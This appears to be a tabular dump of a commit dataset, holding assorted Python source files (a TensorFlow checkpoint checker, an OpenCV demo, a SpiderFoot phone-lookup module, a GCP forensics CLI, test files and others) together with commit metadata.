commit
stringlengths 40
40
| subject
stringlengths 4
1.73k
| repos
stringlengths 5
127k
| old_file
stringlengths 2
751
| new_file
stringlengths 2
751
| new_contents
stringlengths 1
8.98k
| old_contents
stringlengths 0
6.59k
| license
stringclasses 13
values | lang
stringclasses 23
values |
---|---|---|---|---|---|---|---|---|
1613bde53cfda3d38d7e62c6c91f3d6c5407fb9c | Add script inspect_checkpoint.py to check if a model checkpoint is corrupted with NaN/inf values | liyi193328/pointer-generator,liyi193328/pointer-generator,liyi193328/pointer-generator,abisee/pointer-generator | inspect_checkpoint.py | inspect_checkpoint.py | """
Simple script that checks if a checkpoint is corrupted with any inf/NaN values. Run like this:
python inspect_checkpoint.py model.12345
"""
import tensorflow as tf
import sys
import numpy as np
if __name__ == '__main__':
if len(sys.argv) != 2:
raise Exception("Usage: python inspect_checkpoint.py <file_name>\nNote: Do not include the .data .index or .meta part of the model checkpoint in file_name.")
file_name = sys.argv[1]
reader = tf.train.NewCheckpointReader(file_name)
var_to_shape_map = reader.get_variable_to_shape_map()
finite = []
all_infnan = []
some_infnan = []
for key in sorted(var_to_shape_map.keys()):
tensor = reader.get_tensor(key)
if np.all(np.isfinite(tensor)):
finite.append(key)
else:
if not np.any(np.isfinite(tensor)):
all_infnan.append(key)
else:
some_infnan.append(key)
print "\nFINITE VARIABLES:"
for key in finite: print key
print "\nVARIABLES THAT ARE ALL INF/NAN:"
for key in all_infnan: print key
print "\nVARIABLES THAT CONTAIN SOME FINITE, SOME INF/NAN VALUES:"
for key in some_infnan: print key
print ""
if not all_infnan and not some_infnan:
print "CHECK PASSED: checkpoint contains no inf/NaN values"
else:
print "CHECK FAILED: checkpoint contains some inf/NaN values"
| apache-2.0 | Python |
|
d5e16fdf73eb281da3541fa7a0e3f8792b83faeb | bump to 0.3.0 | ledgr/tproxy,benoitc/tproxy | tproxy/__init__.py | tproxy/__init__.py | # -*- coding: utf-8 -
#
# This file is part of tproxy released under the MIT license.
# See the NOTICE for more information.
version_info = (0, 3, 0)
__version__ = ".".join(map(str, version_info))
| # -*- coding: utf-8 -
#
# This file is part of tproxy released under the MIT license.
# See the NOTICE for more information.
version_info = (0, 2, 4)
__version__ = ".".join(map(str, version_info))
| mit | Python |
bb5a94208bb3a96995182b773998dbec4ebf7667 | Test wrapper py script | gracecox/EoSeval | py_scripts/EoSeval_test.py | py_scripts/EoSeval_test.py | # -*- coding: utf-8 -*-
"""
Code description goes in here
"""
import numpy
import EoSeq
from scipy.optimize import curve_fit
# Prompt user for filename string
# filename = raw_input("Please enter a file path for P and V data")
# Load in data file
# data = numpy.loadtxt(filename, delimiter = ',')
data = numpy.loadtxt("/Users/Grace/Documents/EoSeval/data/ferropericlase_Mao_2011_2000K.csv", delimiter = ',')
init_params = [0,0,0,0]
testfunc = BM3EOS(init_params)
BM3 = EOS(testfunc)
| mit | Python |
|
9a082b04973a9927014df496aa31f5c05e8be6ca | add 143 | ufjfeng/leetcode-jf-soln,ufjfeng/leetcode-jf-soln | python/143_reorder_list.py | python/143_reorder_list.py | """
Given a singly linked list L: L0→L1→…→Ln-1→Ln,
reorder it to: L0→Ln→L1→Ln-1→L2→Ln-2→…
You must do this in-place without altering the nodes' values.
For example,
Given {1,2,3,4}, reorder it to {1,4,2,3}.
"""
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def reorderList(self, head):
"""
:type head: ListNode
:rtype: void Do not return anything, modify head in-place instead.
"""
if not head or not head.next:
return
slow, fast = head, head.next
while fast and fast.next:
slow = slow.next
fast = fast.next.next
middlehead = slow.next
slow.next = None
if middlehead and middlehead.next:
pre = middlehead
cur = middlehead.next
nxt = middlehead.next.next
pre.next = None
while nxt:
cur.next = pre
pre = cur
cur = nxt
nxt = nxt.next
cur.next = pre
head2 = cur
elif middlehead:
head2 = middlehead
p, q = head, head2
tmp1 = head.next
tmp2 = head2.next
while tmp1 and tmp2:
p.next = q
q.next = tmp1
p, q = tmp1, tmp2
tmp1, tmp2 = tmp1.next, tmp2.next
p.next = q
if tmp1:
q.next = tmp1
from singlyLinkedList import singlyLinkedList
a = singlyLinkedList([1,2,3,4,5,6])
a.printNodes()
soln = Solution()
soln.reorderList(a.head)
a.printNodes()
| mit | Python |
|
c91c8f56940ba60190f771ef7731169e68b2053e | Create functions.py | ahmedkhaled4d/FCIH,ahmedkhaled4d/FCIH,ahmedkhaled4d/ajax_pagination,ahmedkhaled4d/FCIH | python/openCV/functions.py | python/openCV/functions.py | import numpy as np
import cv2
def nothing():
pass
def Rvalue(x):
#print('R=',x)
return x
def Gvalue(x):
#print('G=',x)
return x
def Bvalue(x):
#print('B=',x)
return x
img = np.zeros((512, 512, 3), np.uint8)
drawing = False # true if mouse is pressed
mode = True # if True, draw rectangle. Press 'm' to toggle to curve
ix,iy = -1,-1
def draw_circle(event,x,y,flags,param):
global ix,iy,drawing,mode
if event == cv2.EVENT_LBUTTONDOWN:
drawing = True
ix,iy = x,y
elif event == cv2.EVENT_MOUSEMOVE:
if drawing == True:
if mode == True:
cv2.rectangle(img,(ix,iy),(x,y),(0,255,0),-1)
else:
cv2.circle(img,(x,y),5,(0,0,255),-1)
elif event == cv2.EVENT_LBUTTONUP:
drawing = False
if mode == True:
cv2.rectangle(img,(ix,iy),(x,y),(0,255,0),-1)
else:
cv2.circle(img,(x,y),5,(0,0,255),-1)
def freePint():
cv2.namedWindow('image')
switch = '0 : OFF \n1 : ON'
cv2.createTrackbar(switch, 'image', 0, 1, nothing)
cv2.setMouseCallback('image', draw_circle)
while (1):
cv2.imshow('image', img)
s = cv2.getTrackbarPos(switch, 'image')
k = cv2.waitKey(1)
if s == 0:
mode = False
if s == 1:
mode = True
elif k == 27:
break
cv2.destroyAllWindows()
def trackbar():
# Create a black image, a window
img = np.zeros((300,512,3), np.uint8)
cv2.namedWindow('image')
# create trackbars for color change
cv2.createTrackbar('R','image',0,255,Rvalue)
cv2.createTrackbar('G','image',0,255,Gvalue)
cv2.createTrackbar('B','image',0,255,Bvalue)
# create switch for ON/OFF functionality
switch = '0 : OFF \n1 : ON'
cv2.createTrackbar(switch, 'image',0,1,nothing)
while(1):
cv2.imshow('image',img)
k = cv2.waitKey(1)
if k == 27:
break
# get current positions of four trackbars
r = cv2.getTrackbarPos('R','image')
g = cv2.getTrackbarPos('G','image')
b = cv2.getTrackbarPos('B','image')
s = cv2.getTrackbarPos(switch,'image')
if s == 0:
img[:] = 0
else:
img[:] = [b,g,r]
cv2.destroyAllWindows();
def dcircle():
trackbar()
img = np.zeros((512, 512, 3), np.uint8)
img = cv2.circle(img, (447, 63), 63, (Rvalue, Gvalue, Bvalue), -1)
cv2.imshow('figer circle', img)
def print_func(par):
return ("Hello" , par);
def drowit():
# Create a black image
img = np.zeros((512, 512, 3), np.uint8)
# cv2.imshow('fig1',img)
# cv2.waitKey()
# Draw a diagonal blue line with thickness of 5 px
img = cv2.line(img, (0, 0), (511, 511), (255, 0, 0), 10)
img = cv2.rectangle(img, (384, 0), (510, 128), (0, 255, 0), 3)
img = cv2.circle(img, (447, 63), 63, (0, 120, 255), -1)
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img, 'OpenCV', (10, 500), font, 4, (255, 255, 255), 2)
cv2.imshow('fig1', img)
def saveimage ():
cv2.imwrite("image_processed.png", img) #the name of new image
| mit | Python |
|
38756d3fd7ac1d858d45f256e8d4ad118ecbf531 | add basic admin file | emencia/emencia-django-socialaggregator | emencia/django/socialaggregator/admin.py | emencia/django/socialaggregator/admin.py | """Admin for parrot.gallery"""
from django.contrib import admin
from django.utils.translation import ugettext_lazy as _
from emencia.django.socialaggregator.models import Feed
from emencia.django.socialaggregator.models import Aggregator
from emencia.django.socialaggregator.models import Ressource
class FeedAdmin(admin.ModelAdmin):
pass
admin.site.register(Feed, FeedAdmin)
class AggregatorAdmin(admin.ModelAdmin):
pass
admin.site.register(Aggregator, AggregatorAdmin)
class RessourceAdmin(admin.ModelAdmin):
pass
admin.site.register(Ressource, RessourceAdmin)
| agpl-3.0 | Python |
|
d53ec3fefddda14e6d7fad466f5e81d3ed369330 | Add sfp_numverify module | smicallef/spiderfoot,smicallef/spiderfoot,smicallef/spiderfoot | modules/sfp_numverify.py | modules/sfp_numverify.py | #-------------------------------------------------------------------------------
# Name: sfp_numverify
# Purpose: SpiderFoot plug-in to search numverify.com API for a phone number
# and retrieve location and carrier information.
#
# Author: <[email protected]>
#
# Created: 2019-05-25
# Copyright: (c) bcoles 2019
# Licence: GPL
#-------------------------------------------------------------------------------
import json
import re
import urllib
import time
from sflib import SpiderFoot, SpiderFootPlugin, SpiderFootEvent
class sfp_numverify(SpiderFootPlugin):
"""numverify:Footprint,Investigate,Passive:Real World::Lookup phone number location and carrier information."""
# Default options
opts = {
'api_key': ''
}
# Option descriptions
optdescs = {
'api_key': 'numverify API key.'
}
results = dict()
errorState = False
def setup(self, sfc, userOpts=dict()):
self.sf = sfc
self.__dataSource__ = "numverify"
self.results = dict()
self.errorState = False
for opt in userOpts.keys():
self.opts[opt] = userOpts[opt]
# What events is this module interested in for input
def watchedEvents(self):
return ['PHONE_NUMBER']
# What events this module produces
def producedEvents(self):
return ['RAW_RIR_DATA', 'GEOINFO', 'PROVIDER_TELCO']
# Query numverify API for the specified phone number
# https://numverify.com/documentation
def query(self, qry):
number = qry.strip('+').strip('(').strip(')')
params = {
'number': number.encode('raw_unicode_escape'),
'country_code': '',
'format': '0', # set to "1" for prettified debug output
'access_key': self.opts['api_key']
}
# Free API does not support HTTPS for no adequately explained reason
res = self.sf.fetchUrl("http://apilayer.net/api/validate?" + urllib.urlencode(params),
timeout=self.opts['_fetchtimeout'],
useragent=self.opts['_useragent'])
time.sleep(1)
if res['content'] is None:
self.sf.debug('No response from apilayer.net')
return None
if res['code'] == '101':
self.sf.error('API error: invalid API key', False)
self.errorState = True
return None
if res['code'] == '102':
self.sf.error('API error: user account deactivated', False)
self.errorState = True
return None
if res['code'] == '104':
self.sf.error('API error: usage limit exceeded', False)
self.errorState = True
return None
try:
data = json.loads(res['content'])
except BaseException as e:
self.sf.debug('Error processing JSON response: ' + str(e))
return None
if data.get('error') is not None:
self.sf.error('API error: ' + str(data.get('error')), False)
return None
return data
# Handle events sent to this module
def handleEvent(self, event):
eventName = event.eventType
srcModuleName = event.module
eventData = event.data
if self.errorState:
return None
if self.opts['api_key'] == "":
self.sf.error("You enabled sfp_numverify but did not set an API key!", False)
self.errorState = True
return None
if eventData in self.results:
return None
self.results[eventData] = True
self.sf.debug("Received event, " + eventName + ", from " + srcModuleName)
data = self.query(eventData)
if data is None:
self.sf.debug("No phone information found for " + eventData)
return None
evt = SpiderFootEvent("RAW_RIR_DATA", str(data), self.__name__, event)
self.notifyListeners(evt)
if data.get('location') is not None and data.get('country_code') is not None:
location = data.get('location') + ', ' + data.get('country_code')
evt = SpiderFootEvent("GEOINFO", location, self.__name__, event)
self.notifyListeners(evt)
else:
self.sf.debug("No location information found for " + eventData)
if data.get('carrier') is not None:
evt = SpiderFootEvent("PROVIDER_TELCO", data.get('carrier'), self.__name__, event)
self.notifyListeners(evt)
else:
self.sf.debug("No carrier information found for " + eventData)
# End of sfp_numverify class
| mit | Python |
|
8b7db3fc9b90897c0e8da6d6b63d12e79754c625 | Solve Knowit2019/19 | matslindh/codingchallenges,matslindh/codingchallenges | knowit2019/19.py | knowit2019/19.py | def hidden_palindrome(n):
n_s = str(n)
if n_s == n_s[::-1]:
return False
s = str(n + int(n_s[::-1]))
return s == s[::-1]
def test_hidden_palindrome():
assert hidden_palindrome(38)
assert not hidden_palindrome(49)
if __name__ == '__main__':
s = 0
for x in range(1, 123454321+1):
if x % 1000000 == 0:
print(x)
s += x if hidden_palindrome(x) else 0
print(s) | mit | Python |
|
f5d4fa76c7ea97af5cd30a3840835e6b97dd0721 | Add release script. (#162) | databricks/tensorframes,tjhunter/tensorframes,databricks/tensorframes,tjhunter/tensorframes | dev/release.py | dev/release.py | #!/usr/bin/env python
import click
from datetime import datetime
from subprocess import call, check_call, check_output, PIPE
import sys
DATABRICKS_REMOTE = "[email protected]:databricks/tensorframes.git"
PUBLISH_MODES = {
"local": "tfs_testing/publishLocal",
"m2": "tfs_testing/publishM2",
"spark-package-publish": "distribution/spPublish",
}
WORKING_BRANCH = "WORKING_BRANCH_RELEASE_%s_@%s"
# lower case "z" puts the branch at the end of the github UI.
RELEASE_TAG = "v%s"
def prominentPrint(x):
click.echo(click.style(x, underline=True))
def verify(prompt, interactive):
if not interactive:
return True
return click.confirm(prompt, show_default=True)
@click.command()
@click.argument("release-version", type=str)
@click.argument("next-version", type=str)
@click.option("--publish-to", default="local", show_default=True,
help="Where to publish artifact, one of: %s" % list(PUBLISH_MODES.keys()))
@click.option("--no-prompt", is_flag=True, help="Automated mode with no user prompts.")
@click.option("--git-remote", default=DATABRICKS_REMOTE,
help="Push current branch and docs to this git remote.")
def main(release_version, next_version, publish_to, no_prompt, git_remote):
interactive = not no_prompt
time = datetime.now().strftime("%Y-%m-%dT%H-%M-%S")
if publish_to not in PUBLISH_MODES:
modes = list(PUBLISH_MODES.keys())
prominentPrint("Unknown publish target, --publish-to should be one of: %s." % modes)
sys.exit(1)
if not next_version.endswith("SNAPSHOT"):
next_version += "-SNAPSHOT"
if not verify("Publishing version: %s\n"
"Next version will be: %s\n"
"Continue?" % (release_version, next_version), interactive):
sys.exit(1)
current_branch = check_output(["git", "rev-parse", "--abbrev-ref", "HEAD"]).strip()
if current_branch == "HEAD":
prominentPrint("Cannot build from detached head state. Please make a branch.")
sys.exit(1)
if current_branch != b"master":
if not verify("You're not on the master branch do you want to continue?",
interactive):
sys.exit(1)
uncommitted_changes = check_output(["git", "diff", "--stat"])
if uncommitted_changes != b"":
prominentPrint("There seem to be uncommitted changes on your current branch. Please commit or "
"stash them and try again.")
prominentPrint(uncommitted_changes)
sys.exit(1)
if call(["which", "protoc"], stdout=PIPE, stderr=PIPE) != 0:
prominentPrint("Cannot find protoc, protoc is required to build tensorfames. See README.md.")
sys.exit(1)
working_branch = WORKING_BRANCH % (release_version, time)
release_tag = RELEASE_TAG % release_version
target_tags = [release_tag]
existing_tags = check_output(["git", "tag"]).decode().split()
conflict_tags = list(filter(lambda a: a in existing_tags, target_tags))
if conflict_tags:
msg = ("The following tags already exist:\n"
" %s\n"
"Please delete them and try.")
msg = msg % "\n ".join(conflict_tags)
prominentPrint(msg)
sys.exit(1)
prominentPrint("Creating working branch for this release.")
check_call(["git", "checkout", "-b", working_branch])
prominentPrint("Creating release tag and updating snapshot version.")
update_version = "release release-version %s next-version %s" % (release_version, next_version)
check_call(["./build/sbt", update_version])
prominentPrint("Building and testing with sbt.")
check_call(["git", "checkout", release_tag])
publish_target = PUBLISH_MODES[publish_to]
check_call(["./build/sbt", "clean", publish_target])
prominentPrint("Updating local branch: %s" % current_branch)
check_call(["git", "checkout", current_branch])
check_call(["git", "merge", "--ff", working_branch])
check_call(["git", "branch", "-d", working_branch])
prominentPrint("Local branch updated")
if verify("Would you like to push local branch & version tag to remote: %s?" % git_remote,
interactive):
check_call(["git", "push", git_remote, current_branch])
check_call(["git", "push", git_remote, release_tag])
if __name__ == "__main__":
main()
| apache-2.0 | Python |
|
58d19ea654e0c8d250f46b0d72191e48b4bc8588 | add tests for encryption/decryption in awx.main.utils.common | wwitzel3/awx,wwitzel3/awx,wwitzel3/awx,snahelou/awx,snahelou/awx,snahelou/awx,snahelou/awx,wwitzel3/awx | awx/main/tests/unit/common/test_common.py | awx/main/tests/unit/common/test_common.py | from awx.conf.models import Setting
from awx.main.utils import common
def test_encrypt_field():
field = Setting(pk=123, value='ANSIBLE')
encrypted = common.encrypt_field(field, 'value')
assert encrypted == '$encrypted$AES$Ey83gcmMuBBT1OEq2lepnw=='
assert common.decrypt_field(field, 'value') == 'ANSIBLE'
def test_encrypt_field_without_pk():
field = Setting(value='ANSIBLE')
encrypted = common.encrypt_field(field, 'value')
assert encrypted == '$encrypted$AES$8uIzEoGyY6QJwoTWbMFGhw=='
assert common.decrypt_field(field, 'value') == 'ANSIBLE'
def test_encrypt_subfield():
field = Setting(value={'name': 'ANSIBLE'})
encrypted = common.encrypt_field(field, 'value', subfield='name')
assert encrypted == '$encrypted$AES$8uIzEoGyY6QJwoTWbMFGhw=='
assert common.decrypt_field(field, 'value', subfield='name') == 'ANSIBLE'
def test_encrypt_field_with_ask():
encrypted = common.encrypt_field(Setting(value='ASK'), 'value', ask=True)
assert encrypted == 'ASK'
def test_encrypt_field_with_empty_value():
encrypted = common.encrypt_field(Setting(value=None), 'value')
assert encrypted is None
| apache-2.0 | Python |
|
8ae3e44b0a43f382c98194b9caa097b62de899ef | Add script to save ner data to a csv file | WhatWorksWhenForWhom/nlppln,WhatWorksWhenForWhom/nlppln,WhatWorksWhenForWhom/nlppln | nlpppln/save_ner_data.py | nlpppln/save_ner_data.py | #!/usr/bin/env python
import click
import os
import codecs
import json
import pandas as pd
@click.command()
@click.argument('input_dir', type=click.Path(exists=True))
@click.argument('output_file', type=click.Path())
def nerstats(input_dir, output_file):
output_dir = os.path.dirname(output_file)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
frames = []
files = os.listdir(input_dir)
for fi in files:
with codecs.open(os.path.join(input_dir, fi), encoding='utf-8') as f:
saf = json.load(f)
data = {}
data['word'] = [t['word'] for t in saf['tokens'] if 'ne' in t.keys()]
data['ner'] = [t['ne'] for t in saf['tokens'] if 'ne' in t.keys()]
data['w_id'] = [t['id'] for t in saf['tokens'] if 'ne' in t.keys()]
data['text'] = [fi for t in saf['tokens'] if 'ne' in t.keys()]
frames.append(pd.DataFrame(data=data))
df = pd.concat(frames, ignore_index=True)
df.to_csv(output_file)
if __name__ == '__main__':
nerstats()
| apache-2.0 | Python |
|
46a40e7e8fc424cc7e7a601fc99ab2d852cd0980 | Add example GCP CLI tool. (#69) | google/cloud-forensics-utils,google/cloud-forensics-utils | examples/gcp_cli.py | examples/gcp_cli.py | # -*- coding: utf-8 -*-
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Demo CLI tool for GCP."""
import argparse
from libcloudforensics import gcp
def ListInstances(args):
"""List GCE instances in GCP project.
Args:
args (dict): Arguments from ArgumentParser.
"""
project = gcp.GoogleCloudProject(args.project)
instances = project.ListInstances()
print('Instances found:')
for instance in instances:
bootdisk_name = instances[instance].GetBootDisk().name
print('Name: {0:s}, Bootdisk: {1:s}'.format(instance, bootdisk_name))
def ListDisks(args):
"""List GCE disks in GCP project.
Args:
args (dict): Arguments from ArgumentParser.
"""
project = gcp.GoogleCloudProject(args.project)
disks = project.ListDisks()
print('Disks found:')
for disk in disks:
print('Name: {0:s}, Zone: {1:s}'.format(disk, disks[disk].zone))
def CreateDiskCopy(args):
"""Copy GCE disks to other GCP project.
Args:
args (dict): Arguments from ArgumentParser.
"""
disk = gcp.CreateDiskCopy(
args.project, args.dstproject, args.instancename, args.zone)
print('Disk copy completed.')
print('Name: {0:s}'.format(disk.name))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Demo CLI tool for GCP')
parser.add_argument('--project', help='The GCP project name')
subparsers = parser.add_subparsers()
parser_listdisks = subparsers.add_parser('listdisks')
parser_listdisks.set_defaults(func=ListDisks)
parser_listdisks = subparsers.add_parser('listinstances')
parser_listdisks.set_defaults(func=ListInstances)
parser_creatediskcopy = subparsers.add_parser('creatediskcopy')
parser_creatediskcopy.add_argument(
'--dstproject', help='Destination GCP project')
parser_creatediskcopy.add_argument('--zone', help='Zone to create disk in')
parser_creatediskcopy.add_argument(
'--instancename', help='Instance to copy disk from')
parser_creatediskcopy.set_defaults(func=CreateDiskCopy)
parsed_args = parser.parse_args()
if parsed_args.func:
parsed_args.func(parsed_args)
| apache-2.0 | Python |
|
9cc4067d581f6a97136e0f186dc8aa1dbc734e47 | verify that the dynamic oracle for ArcEager can reach all projective parses | andersjo/hals | hals/transition_system/arc_eager_test.py | hals/transition_system/arc_eager_test.py | from copy import copy, deepcopy
import numpy as np
from unittest import TestCase
from transition_system.arc_eager import ArcEager, ArcEagerDynamicOracle
def generate_all_projective_parses(size):
arc_eager = ArcEager(1)
initial = arc_eager.state(size)
stack = []
stack.append(initial)
parses = set()
while len(stack):
state = stack.pop()
if arc_eager.is_final(state):
heads, labels = arc_eager.extract_parse(state)
parses.add(tuple(heads))
else:
for action in arc_eager.allowed(state):
state_copy = deepcopy(state)
arc_eager.perform(state_copy, action)
stack.append(state_copy)
return parses
class MockSentence:
def __init__(self, num_tokens):
self.adjacency = np.zeros((num_tokens, num_tokens), dtype=bool)
class TestArcEager(TestCase):
def test_dynamic_oracle_is_complete(self):
SIZE = 4
arc_eager = ArcEager(1)
dyn_oracle = ArcEagerDynamicOracle()
valid_parses = generate_all_projective_parses(SIZE)
for valid_parse in valid_parses:
sent = MockSentence(len(valid_parse) + 1)
for v, u in enumerate(valid_parse):
sent.adjacency[u, v] = True
state = arc_eager.state(SIZE)
while not arc_eager.is_final(state):
allowed_actions = arc_eager.allowed(state)
costs = dyn_oracle(state, sent, allowed_actions)
self.assertEqual(costs.min(), 0)
index = costs.argmin()
arc_eager.perform(state, allowed_actions[index])
heads, labels = arc_eager.extract_parse(state)
self.assertEqual(tuple(heads), valid_parse) | mit | Python |
|
db380d8e6a8dfa5444f82a0978fad3494d923278 | Add tests of generate_matrix | hvy/chainer,chainer/chainer,niboshi/chainer,chainer/chainer,chainer/chainer,niboshi/chainer,niboshi/chainer,chainer/chainer,wkentaro/chainer,hvy/chainer,niboshi/chainer,pfnet/chainer,hvy/chainer,wkentaro/chainer,hvy/chainer,wkentaro/chainer,wkentaro/chainer | tests/chainer_tests/testing_tests/test_matrix.py | tests/chainer_tests/testing_tests/test_matrix.py | import unittest
import numpy
from chainer import testing
from chainer.testing import condition
@testing.parameterize(*testing.product({
'dtype': [
numpy.float16, numpy.float32, numpy.float64,
numpy.complex64, numpy.complex128,
],
'x_s_shapes': [
((2, 2), (2,)),
((2, 3), (2,)),
((3, 2), (2,)),
((2, 3, 4), (2, 3)),
((2, 4, 3), (2, 3)),
((0, 2, 3), (0, 2)),
],
}))
class TestGenerateMatrix(unittest.TestCase):
def test_generate_matrix(self):
dtype = self.dtype
x_shape, s_shape = self.x_s_shapes
sv = 0.5 + numpy.random.random(s_shape).astype(dtype().real.dtype)
x = testing.generate_matrix(x_shape, dtype=dtype, singular_values=sv)
assert x.shape == x_shape
s = numpy.linalg.svd(
x.astype(numpy.complex128), full_matrices=False, compute_uv=False,
)
sv_sorted = numpy.sort(sv, axis=-1)[..., ::-1]
rtol = 1e-3 if dtype == numpy.float16 else 1e-7
numpy.testing.assert_allclose(s, sv_sorted, rtol=rtol)
class TestGenerateMatrixInvalid(unittest.TestCase):
def test_no_singular_values(self):
with self.assertRaises(TypeError):
testing.generate_matrix((2, 2))
def test_invalid_shape(self):
with self.assertRaises(ValueError):
testing.generate_matrix((2,), singular_values=1)
def test_invalid_dtype(self):
with self.assertRaises(ValueError):
testing.generate_matrix(
(2, 2), dtype=numpy.int32, singular_values=1)
def test_shape_mismatch(self):
with self.assertRaises(ValueError):
testing.generate_matrix(
(2, 2), singular_values=numpy.ones(3))
testing.run_module(__name__, __file__)
| mit | Python |
|
3cad51e08ef4c1dcfb11cbb8c32272328b31015a | Prepare v1.2.306.dev | gazpachoking/Flexget,ZefQ/Flexget,tarzasai/Flexget,ZefQ/Flexget,tobinjt/Flexget,OmgOhnoes/Flexget,ianstalk/Flexget,malkavi/Flexget,poulpito/Flexget,ratoaq2/Flexget,poulpito/Flexget,crawln45/Flexget,antivirtel/Flexget,jawilson/Flexget,cvium/Flexget,oxc/Flexget,qvazzler/Flexget,dsemi/Flexget,LynxyssCZ/Flexget,malkavi/Flexget,dsemi/Flexget,Flexget/Flexget,xfouloux/Flexget,Danfocus/Flexget,gazpachoking/Flexget,tarzasai/Flexget,OmgOhnoes/Flexget,drwyrm/Flexget,LynxyssCZ/Flexget,Danfocus/Flexget,Flexget/Flexget,cvium/Flexget,tobinjt/Flexget,qvazzler/Flexget,ZefQ/Flexget,jawilson/Flexget,jawilson/Flexget,malkavi/Flexget,qvazzler/Flexget,tarzasai/Flexget,tsnoam/Flexget,jacobmetrick/Flexget,jawilson/Flexget,spencerjanssen/Flexget,offbyone/Flexget,qk4l/Flexget,JorisDeRieck/Flexget,Pretagonist/Flexget,Danfocus/Flexget,lildadou/Flexget,xfouloux/Flexget,ianstalk/Flexget,crawln45/Flexget,LynxyssCZ/Flexget,xfouloux/Flexget,ibrahimkarahan/Flexget,OmgOhnoes/Flexget,ibrahimkarahan/Flexget,dsemi/Flexget,Danfocus/Flexget,jacobmetrick/Flexget,sean797/Flexget,thalamus/Flexget,ratoaq2/Flexget,qk4l/Flexget,Flexget/Flexget,ibrahimkarahan/Flexget,Pretagonist/Flexget,drwyrm/Flexget,Flexget/Flexget,qk4l/Flexget,sean797/Flexget,offbyone/Flexget,tobinjt/Flexget,tsnoam/Flexget,ianstalk/Flexget,patsissons/Flexget,JorisDeRieck/Flexget,cvium/Flexget,patsissons/Flexget,patsissons/Flexget,offbyone/Flexget,thalamus/Flexget,spencerjanssen/Flexget,antivirtel/Flexget,jacobmetrick/Flexget,malkavi/Flexget,drwyrm/Flexget,lildadou/Flexget,tobinjt/Flexget,antivirtel/Flexget,tsnoam/Flexget,spencerjanssen/Flexget,oxc/Flexget,Pretagonist/Flexget,LynxyssCZ/Flexget,oxc/Flexget,poulpito/Flexget,JorisDeRieck/Flexget,ratoaq2/Flexget,crawln45/Flexget,sean797/Flexget,grrr2/Flexget,lildadou/Flexget,thalamus/Flexget,crawln45/Flexget,grrr2/Flexget,JorisDeRieck/Flexget,grrr2/Flexget | flexget/_version.py | flexget/_version.py | """
Current FlexGet version.
This is contained in a separate file so that it can be easily read by setup.py, and easily edited and committed by
release scripts in continuous integration. Should (almost) never be set manually.
The version should always be set to the <next release version>.dev
The jenkins release job will automatically strip the .dev for release,
and update the version again for continued development.
"""
__version__ = '1.2.306.dev'
| """
Current FlexGet version.
This is contained in a separate file so that it can be easily read by setup.py, and easily edited and committed by
release scripts in continuous integration. Should (almost) never be set manually.
The version should always be set to the <next release version>.dev
The jenkins release job will automatically strip the .dev for release,
and update the version again for continued development.
"""
__version__ = '1.2.305'
| mit | Python |
05e7db377b7f0224ec97d5f96c387d711e1e0f23 | Add problem | mikefeneley/topcoder | src/SRM-144/time.py | src/SRM-144/time.py |
class Time:
def whatTime(self, seconds):
hours = seconds / 3600
a = 3600
leftover = seconds - hours * 3600
minutes = leftover / 60
final_sec = seconds - hours * 3600 - minutes * 60
final = str(hours) + ":" + str(minutes)+ ":" + str(final_sec)
return final
| mit | Python |
|
61f542c215c0b45bf8b4121bc4705c760c334aa9 | Add a SetObjectExtruderOperation class | Curahelper/Cura,hmflash/Cura,hmflash/Cura,fieldOfView/Cura,fieldOfView/Cura,ynotstartups/Wanhao,Curahelper/Cura,ynotstartups/Wanhao | cura/Settings/SetObjectExtruderOperation.py | cura/Settings/SetObjectExtruderOperation.py | # Copyright (c) 2017 Ultimaker B.V.
# Cura is released under the terms of the AGPLv3 or higher.
from UM.Scene.SceneNode import SceneNode
from UM.Operations.Operation import Operation
from cura.Settings.SettingOverrideDecorator import SettingOverrideDecorator
## Simple operation to set the extruder a certain object should be printed with.
class SetObjectExtruderOperation(Operation):
def __init__(self, node: SceneNode, extruder_id: str) -> None:
self._node = node
self._extruder_id = extruder_id
self._previous_extruder_id = None
self._decorator_added = False
def undo(self):
if self._previous_extruder_id:
self._node.callDecoration("setActiveExtruder", self._previous_extruder_id)
def redo(self):
stack = self._node.callDecoration("getStack") #Don't try to get the active extruder since it may be None anyway.
if not stack:
self._node.addDecorator(SettingOverrideDecorator())
self._previous_extruder_id = self._node.callDecoration("getActiveExtruder")
self._node.callDecoration("setActiveExtruder", self._extruder_id)
| agpl-3.0 | Python |
|
57c29ec11b91505cade24670cc45726a8689bb9a | add needed util module | HERA-Team/hera_mc,HERA-Team/hera_mc,HERA-Team/Monitor_and_Control | hera_mc/cm_utils.py | hera_mc/cm_utils.py | # -*- mode: python; coding: utf-8 -*-
# Copyright 2016 the HERA Collaboration
# Licensed under the 2-clause BSD license.
"""Some dumb low-level configuration management utility functions.
"""
from __future__ import print_function
import datetime
def _get_datetime(_date,_time):
if _date.lower() == 'now':
dt_d = datetime.datetime.now()
else:
data = _date.split('/')
dt_d = datetime.datetime(int(data[2])+2000,int(data[0]),int(data[1]))
if _time.lower() == 'now':
dt_t = datetime.datetime.now()
else:
data = _time.split(':')
dt_t = datetime.datetime(dt_d.year,dt_d.month,dt_d.day,int(data[0]),int(data[1]),0)
dt = datetime.datetime(dt_d.year,dt_d.month,dt_d.day,dt_t.hour,dt_t.minute)
return dt
def _get_stopdate(_stop_date):
if _stop_date:
return _stop_date
else:
return datetime.datetime(2020,12,31)
def _is_active(current, _start_date, _stop_date):
_stop_date = _get_stopdate(_stop_date)
if current > _start_date and current < _stop_date:
is_active=True
else:
is_active=False
return is_active | bsd-2-clause | Python |
|
